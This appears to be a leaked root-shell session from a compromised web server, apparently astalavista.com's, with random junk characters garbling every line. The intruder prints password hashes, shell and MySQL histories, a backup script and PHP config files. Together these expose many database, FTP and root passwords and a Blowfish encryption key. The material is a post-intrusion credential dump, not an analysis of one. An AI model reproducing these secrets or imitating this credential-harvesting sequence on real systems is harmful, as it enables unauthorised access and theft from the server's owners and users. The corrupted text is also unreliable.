: X2 y- ~6 h( }* B5 @3 I, g7 M0 zadmin1$sbycsEGo$d81laShnxFiziFaQMH32F.:13770:0:99999:7:::
" |6 A2 B- M4 O3 tjon1$5yHxRLX.$8pZs0cQLNh5uFCK3m4st1.:13777:0:99999:7:::1 t+ Z) P/ J9 x2 c% O& K
com1$jEZ62nri$aDTj.1REsrYePcPBdfOQz1:13780:0:99999:7:::- F3 Q/ \9 _5 R, l# y
astanet1$YniJLAr.$NKtPNNGK9mcmz3/mLMSWC1:14235:0:99999:7:::/ |5 D" J. Y5 X, I3 B! N
S/ }& L4 W4 K8 f8 P4 lsh-3.2# cat /etc/motd
: {+ m0 i* S( E& I5 Y#####################################################
0 z8 \. Z+ W4 i0 N#____ ____ ___ ____ _ ____ _ _ _ ____ ___ ____ #! j" y3 K7 h( E+ H
# |__| [__ | |__| | |__| | | | [__ | |__| #, r0 d2 U+ z2 ]& B+ B
# | | ___] | | | |___ | | \/ | ___] | | | #' E* M' D2 p. ?( _# h2 R' S
# #- u5 Q3 F8 Y/ J
#####################################################+ E% m( l7 g. [. n4 g
# #& f( c. E0 A. e' F5 H, ]
# Admin Contact - 链接标记support@secureservertech.com #) P" V% c P0 o; X( C
# #3 ~4 {7 X. D: W( f7 x5 a* _
# Available ShortCuts #. q- E7 W c9 g' b' l, g
# #
4 B9 n2 P4 ^' |9 ~# nst - list active connections #) w' _5 r1 u5 n$ U0 ^
# ddos - shows how many times each ip is connected #) u& z" V" s9 g- I L4 |
# ltr - restart the webserver #; J, I! ?% A. ^
# phpc - edit the php config file # D6 p% B0 v6 V
# htc - edit the webserver configuration file #
- E5 Z; s& w2 V5 V# up - uptime #
$ E* E4 f) N" m# u0 ~# etd - edit the motd of the day file #/ M, _- W" q/ u
# htr - start and restart apache if needed #
$ Y; I9 }; V9 Y( V: p( ^# syng - shows active SYN_RECV connections #! ^8 J7 \) I* t8 H) H
# synd - syn flood blocker - “synd -h” for usage #
+ T! |, J% x# u1 s#####################################################
8 ^+ m4 J) z, C' Z8 v+ f( o$ {# NOTES: #
; s+ ^4 I* |8 P: i: S; b3 k; o# Last Upgrade - 12-08-2008 by JF #
, t( p& H& W3 J# My.cnf/Mysql Optimization - 1-28-09 #
( Y" m1 _8 Y5 \: N2 ~$ d# #
x: l2 R# I) j- \# o8 z+ g# #+ Z4 G" o- _3 x! [. O4 d" a
# #9 q8 z; B4 V5 v, H4 ^0 Q C% f6 S
#####################################################
5 z- n% J; i: p C/ i, P. K# L9 F
sh-3.2# lastlog | grep -v Never
1 o, S9 u- q$ M, L5 u+ TUsername Port From Latest! \6 V* m- \% t. J
root pts/1 adsl-194-162-fix Thu Jun 4 07:19:14 +0000 2009
/ z1 Y" K+ E/ F+ ?; ?& i: C. m2 e: Sadmin pts/1 cp.secureservert Thu Mar 20 10:25:39 +0000 2008( ]$ I8 t! J& ^. B7 k: L5 ^
com pts/0 cust.static.212- Tue Jun 2 07:46:30 +0000 20090 J- k" c! H7 G- P
astanet pts/0 adsl-194-162-fix Thu Apr 16 08:20:44 +0000 20099 Y% ?* k" K: m
9 S2 g9 D/ l1 K( ]' ]
sh-3.2# ls -la8 S) b. Q2 G2 F0 N/ R7 Z2 R
total 453376" N1 {8 }! z/ ]! c! u
drwxr-x— 15 root root 4096 Jun 4 08:40 .# |6 Q6 c0 }4 b( ]
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..! R( X& I4 y* f# ]: _
-rw-r–r– 1 root root 2394400 Oct 19 2007 10mbtest.zip# V0 E* J4 P. i' A$ g6 z6 W
-rw——- 1 root root 1006 Sep 11 2007 anaconda-ks.cfg$ ]* ^ H) t$ K
-rw——- 1 root root 16836 Jun 4 07:21 .bash_history3 M! T4 d: f8 g/ f7 g5 {
-rw-r–r– 1 root root 24 Jan 6 2007 .bash_logout
3 P2 e! l% C8 ~- M1 I7 _+ e-rw-r–r– 1 root root 191 Jan 6 2007 .bash_profile5 G- Q$ |4 S9 R/ g& n: _0 k$ A
-rw-r–r– 1 root root 176 Jan 6 2007 .bashrc
1 C! H3 ^) X' [-rwx—— 1 root root 1899 Oct 28 2007 bk.sh
, a4 j2 s# ~2 A6 c8 u-rw-r–r– 1 root root 1327 Nov 29 2007 cert2 B, {$ x9 n, ?
-rw-r–r– 1 root root 139860821 May 14 2008 contrexxbackup_20080514.sql
3 a# h# o! E8 a4 V* Pdrwxr-xr-x 4 root root 4096 May 20 2008 .cpan
0 u- C* v# v0 E; P/ n8 y5 l3 V-rw-r–r– 1 root root 100 Jan 6 2007 .cshrc
9 u' v: u/ n, {( c1 ^" t6 q# C-rw-r–r– 1 root root 323079 Mar 31 13:48 defaultp_ports.sql
* ?3 J8 s$ [ K/ {drwx—— 2 root root 4096 Oct 28 2007 .elinks1 ]0 r% o6 W& t5 H5 k. k
drwxr-xr-x 13 root root 4096 Mar 21 2008 gdb-6.7.1% h6 f' e, W+ R, r# \/ e ]
-rw-r–r– 1 root root 15080950 Oct 29 2007 gdb-6.7.1.tar.bz2" Y/ J1 p* X; h( b
-rw——- 1 root root 0 Apr 16 13:19 .history0 f9 V( G4 U ^2 u
-rw-r–r– 1 root root 16095 Sep 11 2007 install.log
# c( ~# j& C7 B-rw-r–r– 1 root root 2566 Sep 11 2007 install.log.syslog
, b! @9 E/ t$ c: Y-rw-r–r– 1 root root 1003 Jul 22 2007 install.sh
: z% v6 v1 H& a4 ]: A: I& b-rw——- 1 root root 35 Jun 2 14:23 .lesshst3 k* Y4 C8 l& [+ L2 y; j' T/ {" e
drwxr-xr-x 2 root root 4096 Dec 29 2007 .lftp( S) H+ k- E: X# B( S& w
drwxr-xr-x 10 root root 4096 Sep 14 2007 linux-2.6.19.2-grsec6 K9 Y& q' E. w3 r1 G1 Z( U: D! X
-rw-r–r– 1 root root 94979336 Feb 16 2007 linux-2.6.19.2-grsec.tar.gz
1 p& t) J9 C2 ?-rw-r–r– 1 root root 4737058 Sep 22 2007 linux-2.6.22.tar.bz2
3 L: Y$ L" P7 i2 j1 B# K" ?/ e-rwx—— 1 root root 760 Sep 18 2008 lp
$ \) }/ a7 F# l7 Q( s( y, ?; Rdrwxr-xr-x 12 root root 4096 Nov 30 2007 lsws-3.3.1
% j' `( h) Y8 Y ^-rw-r–r– 1 root root 2480045 Nov 30 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz
' X/ T# G; I! o6 K( _9 E-rw-r–r– 1 root root 6388501 Nov 29 2007 lsws-3.3.1-ent-x86_64-linux.tar.gz.1
" |( I2 @6 d" \4 u, G4 O @drwxr-xr-x 12 root root 4096 Mar 21 2008 lsws-3.3.9% o! N; V6 C& t+ t1 O
-rw-r–r– 1 root root 6437577 Mar 21 2008 lsws-3.3.9-ent-x86_64-linux.tar.gz
{ @6 l" f# Z* R: a; Mdrwxr-xr-x 12 root root 4096 May 29 15:10 lsws-4.0.3
7 I' z; [: w, |0 p6 }0 G$ W8 O9 F-rw-r–r– 1 root root 6496050 May 8 05:59 lsws-4.0.3-ent-x86_64-linux.tar.gz8 N2 H U" P2 m4 A3 K
-rw-r–r– 1 root root 25316 Feb 15 2006 mybk.sh* w ^8 f/ Z* L
-rw——- 1 root root 41 Oct 19 2007 .my.cnf
9 k$ @. S3 Q4 A. s% ^-rw——- 1 root root 2902 Jun 4 08:40 .mysql_history: N/ v" |2 w0 `1 T& [% W6 R
-rwx—— 1 root root 38873 Apr 16 2008 mysqlreport3 s( I W( q/ r& W v+ Y1 X! S
-rw——- 1 root root 41 May 20 2008 .mytop
- _, L: e4 |% Ydrwxr-xr-x 3 1000 1000 4096 May 20 2008 mytop-1.6
# M+ L# \) b- r/ M3 W" C-rw-r–r– 1 root root 19720 Feb 17 2007 mytop-1.6.tar.gz! } Q _4 z" l9 Y
drwxr-xr-x 2 root root 4096 Oct 28 2007 .ncftp
9 F( F/ b) @0 `* N-rw——- 1 root root 1462 Sep 21 2007 opt.php
- R7 u( @' c" e( P-rw-r–r– 1 root root 3371 Sep 22 2007 p6 [8 _. _3 ^) P+ F! ~2 c! C# S
-rw-r–r– 1 root root 7608429 Aug 30 2007 php-5.2.4.tar.bz2" F2 ]7 w& S& @- B) f
-rw——- 1 root root 1024 Feb 3 21:32 .rnd5 L2 C4 G2 k( `
-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
% u4 B' D# A5 P- X-rw-r–r– 1 root root 887 Nov 28 2007 server.key
# X0 s3 u) `' j# y; i. j, k# n9 Zdrwx—— 2 root root 4096 Oct 10 2008 .ssh9 g9 t4 c1 x7 {
-rw-r–r– 1 root root 44227 Oct 28 2007 tar-inc-backup.dat
7 F; @) T2 a" M" g-rw-r–r– 1 root root 129 Jan 6 2007 .tcshrc4 V W+ S% F {$ r6 |* U& b
-rw-r–r– 1 root root 104874307 Oct 17 2007 test100.zip. S- L, ^! ~' S+ p9 a4 b# r+ l% r
-rw-r–r– 1 root root 67085540 Oct 19 2007 test100.zip.1
0 v( n' ^5 \# h2 t8 V! Ydrwxr-xr-x 2 root root 4096 Apr 29 11:15 tmp
1 o7 U# [* [$ q6 u& O2 \5 T- J-rw-r–r– 1 root root 42596 May 21 2007 tuning-primer.sh
, f9 l; l8 G1 T6 xdrwxrwxrwx 19 1000 users 4096 Mar 21 2008 valgrind-3.3.0
) j' l/ t, e0 p-rw-r–r– 1 root root 4519551 Dec 11 2007 valgrind-3.3.0.tar.bz2
1 W) Z& I+ m; _: [. u4 R1 p6 C# k-rw——- 1 root root 12997 May 16 2008 .viminfo
4 z ?$ o) N6 \, e" L
/ } z. K* u3 E/ Z; xsh-3.2# cat .bash_history
0 |; P3 X) S, m! P5 r" n( N& Z% R[snip]
; V3 P7 n# Y" b3 e4 b2 B! Swget cp4sst.com/sstlinux.tar.gz0 {, i5 n& S& d/ z3 |
tar zxvf sstlinux.tar.gz
9 n: J8 e d$ }& V% ~cd linux-2.6.27.10
7 u6 y; {! G' T+ Xsh install.sh+ k8 b- \& r0 |
make bzImage ; make modules ; make modules_install ; make install% g& N' e4 F& U! ^
make clean
' k0 }" n! y9 }* |3 eservice mysqld restart$ e6 W w6 s& T0 \) v, i5 P( c
[snip]7 A6 P+ n0 d( ` d6 b* w
cd /usr/sbin/
4 B3 d* j8 \9 E3 c0 bchmod 4777 traceroute
% _7 C4 `1 z% r4 J, f- v' Rchmod 4777 ping5 c( K' q8 W l- s
traceroute -I 链接标记[url]www.astalavista.ch[/url]
5 @0 G4 J- @, u0 p! J6 {6 ?& ~2 w[snip]0 f6 C3 E; i) }& d1 r3 V* c, w
vi /etc/csf/csf.conf' o$ R( ^2 y- [: m* e' e
traceroute google.ch
: \6 B# E+ \' P/ X% _$ ?$ Eservice csf restart7 Z* W9 x2 @ O2 p, L% \/ Y
tracert google.ch
% [( @0 O7 _' M" Y, J2 W% f; G8 Xservice csf restart6 @/ {) ?2 l) w& G3 C7 x5 h
traceroute 链接标记[url]www.google.ch[/url]
$ I1 [. {$ C3 Stracert 链接标记[url]www.google.ch[/url]
4 l5 @2 I6 }8 F rtraceroute 链接标记[url]www.google.ch[/url]3 g# \, |. b5 o+ c% G0 V7 K, g& O+ J
locate traceroute
/ b' d% w) y/ w% p, ?: P7 mchown 4755 /bin/traceroute
7 H/ K) G7 C/ n8 m, L9 U/ k g3 v' Vchown 4777 /bin/traceroute! F9 C5 ^9 U0 ]5 _7 c
locate ping0 v2 C5 V& e* Z; V8 T0 M8 Z
chown 4755 /bin/ping
3 W" o( X4 m9 xchown 4777 /bin/ping
; ]1 r5 j1 ~; ncd /bin/# {/ ]( X- D7 H0 x4 v2 |. k6 d
ls -ali | grep ping
* q) E2 B1 Z+ d' S, O1 pchown root ping
# z' o* [. P* Hchmod 4755 ping5 V9 y7 l L9 c) w/ ^) [: ]
ls -ali | grep traceroute8 ^ {3 o* ^0 r% P! G, }& f, e, ]& G
chown root traceroute: |* I( M- _7 |+ L, S. s* ?! r6 X
chmod 4755 traceroute
7 U) @/ s# K" w' H6 J* Wls -ali | grep traceroute
3 S1 T+ w6 r8 R" u$ g: ^8 Atraceroute -I 链接标记[url]www.google.ch[/url]$ m$ H/ Q- j% B0 Z% N% e
traceroute 链接标记[url]www.google.ch[/url]' r: T" S: d4 X8 @
whois pmsantos.ch7 R, m6 Y; U9 [# N
[snip]: w9 J/ V' d4 ]6 b
mysql -h com_contrexx2_live < /root/defaultp_ports.sql6 A" d8 _; f; {) {( Y) I# d
mysql -h -ucontrexxuser2 -p0fEYNZgXz1pKe com_contrexx2_live < /root/defaultp_ports.sql1 o* t6 y. L' Q9 ~7 f( a$ g! ]
mysql -h -u contrexxuser2 -p com_contrexx2_live < /root/defaultp_ports.sql; [* q) m0 s1 I2 r; N( w
mysql -h localhost com_contrexx2_live < /root/defaultp_ports.sql
+ _$ U4 _# o8 L( }; K. y, |" Otop
7 ~3 q" q1 m: `6 x* P, fping ssth.ch$ l% q0 ^' G O1 n. o" L
ping asdlkfaljgasd???ljg???lasj.ch
6 x: T# U+ w) U5 {" S- kping asdlkfaljgasdlasj.ch
/ T6 t7 F( `# ~: xping 链接标记[url]www.ssth.ch[/url]
4 R, {' n" R4 \' Q1 u0 ^ping ssth.ch! q+ F/ g( o% _8 z, i3 v3 Y
nslookup 链接标记[url]www.google.ch[/url]. K4 [1 N4 I6 x% X
nslookup 链接标记[url]www.ssth.ch[/url]. u/ o! Z3 L/ C! R; E3 ?! z b
man nslookup' H7 ~9 ?! R, F( f' G
ping 链接标记[url]www.google.ch[/url]
/ f4 J+ k0 j$ P( A, w; [6 gnslookup 链接标记[url]www.google.ch[/url]
4 c) n9 v& n- ~- m( C: b9 dnslookup 链接标记[url]www.google.ch[/url]* C' y" T0 W; X- K5 D3 t) f- F) z
nslookup salfjasdlf.ch
: {! s( m0 E5 w( m% o[snip]
. y) c$ ~: b) ~" zopenssl passwd -1 sadf- Y0 f0 g# e! D1 M0 \6 w6 a
openssl passwd -1 5cZNHstdTy
( Q4 K$ _# G* L' p5 A Ymysql' p' L6 V" F. a: Y% C
mysql
) C& |2 V9 w0 ^! S. o$ Nlocate proftp
) p: Z( `0 W/ o8 yvi /etc/proftpd.passwd5 o4 G( u% p& u* h% a; p1 C1 W! ~
service proftpd restart5 y9 L& e+ N9 g! _
locate proftpd.conf) g/ g/ r; Q- e9 i. m2 c/ h$ ~2 D
vi /etc/proftpd.conf
" A7 T5 \- I Gvi /etc/proftpd.passwd
8 H5 l0 v1 W9 I3 {" Wservice proftpd restart
7 ^& A0 Q' {" k7 i1 d4 |9 H[snip]" V* R2 B2 Z+ M/ R
/bin/sh /home/com/backup_system/backup.sh8 }( W9 z+ T! V/ j1 b; Y
tar cfv /home/com/backups/09-04-28_backup.tar /home/com/public_html/admin
% m1 E8 R+ f# J* g* ymysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2_live > 09-04-29-com_contrexx2_live-full.sql
) v9 W }4 f$ S: A( \$ ]0 l1 a/ Zmysqldump -h localhost -u contrexxuser2 –password=0fEYNZgXz1pKe com_contrexx2 > 09-04-29-com_contrexx2-full.sql- i/ s! }' t5 s+ |3 s2 L; H2 B
ls -ali
0 |+ j& ~5 J# {1 m ~8 Mmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS com_contrexx > 07-04-29-com_contrexx-full.sql
@ k, ]# O8 p% \ S# S( Mmysqldump -h localhost -u com_user1 –password=Undv7gu29gvb5ikhS ideapool > 07-04-29-ideapool-full.sql# o+ U, i) _ \. n' K3 o8 C( S
crontab -l
( W6 O | R g+ t2 h( q' ?crontab -l: D8 }: \$ M* R @" {
php -q /home/com/public_html/modifications/cronjobs/securitynews.php
! h' l5 B }% q7 z/home/com/public_html/modifications/cronjobs/exploits.sh# K# ]9 `% u0 l i
wget 链接标记[url]http://www.litespeedtech.com/pac ... x86_64-linux.tar.gz[/url]
_* A- j- K# b6 h) O" n4 ?tar zxvf lsws-4.0.3-ent-x86_64-linux.tar.gz
8 F9 r& [; g4 b9 G, N. i+ ?) Kcd lsws-4.0.3$ @1 S9 g. X& @! T: V; _
sh install.sh
8 R7 X% H/ c5 w& Y) Cuptime
0 p- ?! s0 Z# zhdparm -tt /dev/sda
9 l5 G/ @) N. y, i" fiostat! _; `: j" G! h; ]
yum install iostat
) T9 t. ?5 ^& J7 viostat
; l$ x0 S+ k1 \whereis iostat
" Q r! L2 v( @* t& Q6 f* I; yyjm clean all/ x, x/ E& V- Z: b* U
yum clean all ; yum -y update
2 s% p9 A T6 b6 y' liostat+ U; o3 D0 Q0 x) L% F9 A* N& e' j
yum install systat* P' @/ a3 ]$ S$ ^. ^& g7 n
rpm -qa | grep iostat2 Z7 Z v' K9 ]$ u- l' b. a2 T
rpm -qa | grep sysstat
d& P3 T* v1 @. i1 ^8 Zrpm -qa | grep systat
9 C: b/ j X: ^; Ndmesg -c
; o( E7 n4 W) G3 a$ M& U- Fsysctl -p
; @6 {/ k: }. L1 quname -r
6 S, U1 t$ P* l/ ?) _cd /usr/src
+ K8 d2 C7 A I% Lwget nix101.com/kernels/sstlinux.tar.gz
3 N, B5 r- J# Nshutdown -r now; i8 ^3 H2 g/ N3 ~, B) l$ {
nano -w /boot/grub/grub.conf8 g# E) M" G, o4 B; F
9 ]# a" ^' ^6 N* w
sh-3.2# cat .my.cnf; m, v$ [' B6 {
[client]
8 g4 \, T; x/ Z+ s* W, vuser=da_admin, L4 J' F0 y* r, i: R& h' v6 ^6 }5 z
password=X9dctmRH
& C6 u+ I3 i0 f. |+ K) F4 h; |9 K0 u1 {3 i) v
sh-3.2# cat /home/com/backup_system/backup.sh( D( J( x# v6 x$ e/ m' A8 [
#!/bin/sh1 k3 L) Y: X/ f0 \* t
#####################################################################' r- M p7 R) O& g$ e# ] T5 e
# #
3 ^( Z% p$ ^+ B3 ]# incremental backup for astalavista.com #
6 m4 y, G) P0 a0 q# #+ \. a# `. G/ T! u$ ~; I
# author: Paulo M. Santos <链接标记paulo.santos@astalavista.com> #3 S4 w' @2 D, d. Q( ~: Q7 X
# #- x F0 s8 v0 w
#####################################################################+ \7 v$ Z3 S* A# ]" [7 a/ x
[snip]3 T; D- l n& R- q& M2 T5 V
PROG_DIR=”/home/com/backup_system”;( K6 i5 U" J5 P, W2 F- _
BACKUP_DIR=”/home/com/backups”;
: [1 c& d+ ?6 x9 f* j+ j1 z* x ^DOBACKUP_FROM=”/home/com/domains/astalavista.com/public_html”;6 r# W4 P( ~- X1 V- X4 X$ Z* m1 }
# ftp for synology backup server
4 E# ?& Q* g" G! TFTP_HOST=”212.254.194.163″;( W% o" c" S3 @8 C+ |* v5 I
FTP_PORT=”21″;
0 O$ H0 t' e. p! d# @4 L3 T8 x# NFTP_USER=”astalavista.com”;
+ _9 ~1 P5 ?1 \5 }5 p: C1 f* {FTP_PASS=”yWHOJbzpWTWC6Xrmg1WnfBk5V”;% B- P! d% B0 }0 ^, M
FTP_DIR=”/astalavista.com”;
7 t2 W6 i: m6 \! w, l5 H) P# database3 D6 {) S! M) z: H
DB_HOST=”localhost”;- |4 R+ N. m8 n' h; C
DB_USER=”contrexxuser2″;
) ?0 o- n5 r B0 nDB_PASS=”0fEYNZgXz1pKe”;5 k% g3 ]8 v; V3 ^1 | K
DB_DATABASE1=”com_contrexx2_live”;
( _ {, ~ m: hDB_DATABASE2=”com_contrexx2″;
% ~; ?% |9 T& o* {: f3 j[snip]
, a1 `9 @5 i% Nftp -in $FTP_HOST $FTP_PORT <<EOF
+ X" Z3 o3 d% S) }quote USER $FTP_USER
9 i9 z* ~6 e$ J3 T2 w. Gquote PASS $FTP_PASS
5 W& J/ O% A1 d6 X+ Q6 g+ Scd $FTP_DIR) Z* g/ R& s, X/ H% G y
put $DB_FULLNAME-SQL_Dump.tar# x5 z& j- r+ h7 U- G; x
put $BACKUP_FULLNAME-Public_HTML.tar
# X" g" p0 [# v* ^' Q2 Uclose
7 n) T$ Z/ D1 N& g* abye
9 [' y" q4 N) E7 A5 G$ YEOF6 l/ v4 G2 \& N% }3 [
, e5 E4 O( D0 q% x+ M
sh-3.2# cd /home
7 z% O' }8 W0 Esh-3.2# ls -la
: l" s, m9 H6 Ototal 120$ n3 K" f( b8 J1 I. [
drwxr-xr-x 14 root root 4096 Mar 11 17:56 .6 q5 ?6 R- G3 S. m
drwxr-xr-x 25 root root 4096 Jun 3 02:43 ..
0 _$ K/ Y6 @; I6 }# J6 \0 U: pdrwx–x–x 9 admin admin 4096 Nov 28 2007 admin0 z, O- ]- U" m
-rw——- 1 root root 8192 Jun 4 03:03 aquota.group8 q; b+ k3 y0 s9 E
-rw——- 1 root root 8192 Jun 3 02:45 aquota.user
^2 M8 F( W: e& q& u/ Fdrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 astanet
! Y4 ?0 r6 d! a& [( Jdrwxr-xr-x 2 root root 4096 Jul 29 2008 backup
( Y$ L) Z9 q. n2 q+ T& Pdrwxr-xr-x 2 root root 4096 Sep 17 2008 backup.14161
8 i( ?$ L) x& H4 d2 ]$ vdrwx–x–x 10 com com 4096 Apr 28 12:40 com j2 b3 a3 @' u- c1 ?
drwxr-xr-x 2 root root 4096 May 17 2007 ftp( f$ V( ]) |4 \/ W# Y/ p
drwx—— 3 jon jon 4096 Sep 21 2007 jon
2 h+ V- Y' @ u/ ]/ Zdrwx—— 2 root root 16384 Sep 11 2007 lost+found1 X9 F/ Z5 y, O5 c/ N( r% z
drwxr-xr-x 2 root root 4096 Sep 14 2007 my0 F( b3 p8 D! c4 H) C! A% I
drwxr-xr-x 5 mysql mysql 4096 Sep 24 2007 mysqldata
/ S4 M6 Z a @# f( X1 Jdrwx—— 2 jon jon 4096 Sep 15 2007 test
/ }" i5 a7 ~, f3 f0 ^drwxrwxrwt 2 root root 4096 Jul 29 2008 tmp( e; i# P, M, X& k, ^7 K5 N
- q! X0 r0 m$ B, L
sh-3.2# cd admin
9 ?2 T# r7 N" s# w& {" h, Y4 b ush-3.2# ls -la
: x4 K* x- a) ^ P) ]2 }) G5 rtotal 1735896# ~+ q5 t& W; l# N8 u7 X
drwx–x–x 9 admin admin 4096 Nov 28 2007 .3 o6 V6 i: m2 b& e0 b
drwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
* j0 q$ j4 m; X, ~ E6 Gdrwxrwxr-x 2 admin admin 4096 Oct 25 2007 admin_backups
6 r6 X; Z3 ?0 J% ]6 ~' ?drwx—— 2 admin admin 4096 Sep 28 2007 backups
- S/ r; @ h. _- ~0 \; C$ q-rw——- 1 admin admin 860 Sep 17 2008 .bash_history' e/ b& j0 {: |+ ^5 r
-rw-r–r– 1 admin admin 24 Sep 14 2007 .bash_logout
3 R9 y; }- I2 I4 ^* L' y2 N# B+ C-rw-r–r– 1 admin admin 176 Sep 14 2007 .bash_profile: L+ g* H, |. k D
-rw-r–r– 1 admin admin 124 Sep 14 2007 .bashrc$ q i& Z8 R- \- h* k; Y
drwxr-xr-x 2 root root 4096 Sep 28 2007 com_backups
" h7 [: S* e# ^$ Z$ s: z; T' ^drwx–x–x 6 admin admin 4096 Sep 21 2007 domains
6 ~& ~' K, A) c3 B: g* |drwxrwx— 3 admin mail 4096 Sep 21 2007 imap
9 }. g# }% {1 E z4 l1 S: B# ]-rw-r–r– 1 root root 24 Sep 21 2007 info.php( F& a1 s, X/ d0 u% v9 u
drwx—— 2 admin admin 4096 Sep 21 2007 mail
; y" e& S0 T4 T; z, e" g4 P4 a-rw-r–r– 1 root root 716 Nov 28 2007 server.csr
5 I9 c% L% B" X-rw-r–r– 1 root root 887 Nov 28 2007 server.key
( V% ^) K0 ?6 K8 H-rw-r—– 1 admin mail 34 Sep 14 2007 .shadow( v8 l4 o9 ?0 p+ P
-rw-r—– 1 admin com 1775711054 Oct 25 2007 user.admin.com.tar.gz, ~( o. y6 s/ |0 n& j& V$ P4 C, q) I
drwx–x–x 2 admin admin 4096 Jul 29 2008 user_backups
0 \/ G4 K+ U3 f2 }' V- \( ^
$ ^$ ~8 ~( x, d/ N$ \4 A" d3 F7 Ksh-3.2# ..1 ?% r2 q) u* x
sh-3.2# cd jon# L9 V5 L, L; }8 @2 W% F& l
sh-3.2# ls -la% h& _7 `% P2 B
total 36
9 Y8 g4 [) h* Z* odrwx—— 3 jon jon 4096 Sep 21 2007 .
; ^8 t7 l0 D3 U* r7 _6 \drwxr-xr-x 14 root root 4096 Mar 11 17:56 .., X3 \; y8 n) W( O3 b+ C( d
-rw——- 1 jon jon 53 Sep 21 2007 .bash_history/ |, L5 B% ^0 X) V" `/ G
-rw-r–r– 1 jon jon 24 Sep 21 2007 .bash_logout
+ B- n( S7 O" n% z-rw-r–r– 1 jon jon 176 Sep 21 2007 .bash_profile9 I' K! y( \9 E5 f; o& ^' m" Q; r* `
-rw-r–r– 1 jon jon 124 Sep 21 2007 .bashrc
& f% o h1 C" N1 b-rw-r–r– 1 root root 24 Sep 21 2007 info.php- m- _7 p9 u0 x2 [% W) f8 b6 k
drwxrwxr-x 2 jon jon 4096 Sep 21 2007 public_html
1 i/ \: w; @7 W1 Q+ m% h
7 A8 ~* g6 l' O5 dsh-3.2# cd ..& C# Z' M1 h6 {! g# U. {
sh-3.2# cd test9 Q- t9 I) y |! k$ M# Z
sh-3.2# ls -la
, |3 F2 N! D$ l4 B: W! rtotal 48
o3 S1 c; r- o) Mdrwx—— 2 jon jon 4096 Sep 15 2007 .
2 [9 f7 @# c, G9 x9 p0 Y8 Hdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
' S; ^1 g, ^% v; Z-rw——- 1 jon jon 79 Sep 21 2007 .bash_history
6 f/ D& K: i2 H; E! J- D% S-rw-r–r– 1 jon jon 24 Sep 15 2007 .bash_logout8 P8 B8 r! v' f7 p
-rw-r–r– 1 jon jon 176 Sep 15 2007 .bash_profile: m4 ?, }; W7 T# g
-rw-r–r– 1 jon jon 124 Sep 15 2007 .bashrc1 g# g( }7 w0 b- R/ h7 p' B
sh-3.2# cat .bash_history
' K, G8 W" { V* M/usr/bin/mysqladmin -u root password PoliuJhytg67
8 m$ U0 K& {7 u
, ^+ g' o( n! L' ksh-3.2# cd ../ O2 G7 M+ ^. T; A4 U" M
sh-3.2# cd astanet5 H6 F. o6 {, D5 l; b9 J
sh-3.2# ls -la
0 Q3 N8 V8 h5 u" [: ]2 mtotal 52
" r# G) J. P' A8 y- T7 ydrwx–x–x 6 astanet astanet 4096 Jun 4 09:51 .
$ n( I i2 V" u' t4 b0 Gdrwxr-xr-x 14 root root 4096 Mar 11 17:56 ..
: {$ ^4 p0 N+ |3 C3 n" _drwxr-xr-x 2 root root 4096 Dec 23 16:00 auth
( {& K$ K7 ~! n" c-rw——- 1 astanet astanet 3892 Apr 16 12:14 .bash_history
, R/ r% ~% g% w$ @, o3 J# R-rw-r–r– 1 astanet astanet 33 Dec 17 21:50 .bash_logout
$ \" @) d8 T- R M-rw-r–r– 1 astanet astanet 176 Dec 17 21:50 .bash_profile- v3 X) h" h3 S$ H8 c, Y
-rw-r–r– 1 astanet astanet 124 Dec 17 21:50 .bashrc
5 U. T+ Z4 a8 l5 Rdrwx–x–x 3 astanet astanet 4096 Dec 23 12:18 domains( I/ s/ s, f/ L! S& L
drwxrwx— 3 astanet mail 4096 Dec 23 12:18 imap g; s! {) l' F }6 I) z/ H% D( E! Z! q
drwx—— 2 astanet astanet 4096 Dec 23 12:18 mail
. R% V( _' S6 A0 x% b-rw——- 1 astanet astanet 197 Jun 4 09:51 .mysql_history
# `' G$ B; }# {( j- b+ o1 u: alrwxrwxrwx 1 astanet astanet 37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
' O& |6 X: _( u A-rw-r—– 1 astanet mail 34 Dec 22 12:41 .shadow; i0 C$ {* e3 X& u9 Z
; i9 q. I8 \# Y; ^4 a
sh-3.2# cd auth/
X% T; C& \; n- p0 R4 O# ash-3.2# ls -la
: g; q/ ~6 V* K+ {total 28
% I: b2 d, J6 E9 y$ d6 hdrwxr-xr-x 2 root root 4096 Dec 23 16:00 ./ N9 K+ [" j- ]2 R- t4 g& |- z
drwx–x–x 6 astanet astanet 4096 Jun 4 09:51 ..9 R5 f, N7 L1 |- j# L3 h
-rw-r–r– 1 root root 321 Jan 5 2006 hackercontest.config.inc.php. W) ]8 w3 |8 r" j+ r2 R4 Y
-rw-r–r– 1 root root 319 Jan 5 2006 hosting.config.inc.php* x8 {4 ^7 D* u: G/ M
-rw-r–r– 1 root root 24 Jun 4 09:38 .htadm_pwd/ \' c! v2 s* p7 ^# D( C
-rw-r–r– 1 root root 49 Jan 5 2006 .htpasswd_newhosting
& H5 \& n" e0 Z4 z! U; T* s-rw-r–r– 1 root root 51 Oct 11 2006 .htwebalizer_pwd
) Z9 S+ z4 Z) U6 v) x! v4 ^4 W5 P, b% H; u7 m3 k
sh-3.2# cat hackercontest.config.inc.php& h! r# ~3 a* Z& g
<?PHP
1 C. x- g/ X* o$ `$ n' D% l) t// Variabeln f?r Verbindung zur Datenbank //, D% w2 a6 R1 T* K
$conxHost = ‘localhost’; // MySQL hostname
- i9 _- h6 t% Z' J" p6 q$conxUser = ‘hackercontest’; // MySQL user* e& X; p/ v/ b0 L5 ?
$conxPassword = ‘K6m@7dUc’; // MySQL password% S2 x' B' b7 W" r+ i& ?9 _) m
$bfkey = ‘cXvB3981′; // Encryption/Decryption Key for Blowfish
- h1 X) P( W6 E/ S5 p" y?>
% o0 x2 z7 }& Q; K/ @sh-3.2# cat hosting.config.inc.php
: j5 O8 z) J }4 \5 n$ J# N) T<?PHP
4 G% T+ H d8 h/ B// Variabeln f?r Verbindung zur Datenbank //
. x$ Y/ a& L& W. q* N- W$conxHost = ‘localhost’; // MySQL hostname0 w4 |% N1 U$ U) a- U
$conxUser = ‘hostinguser’; // MySQL user
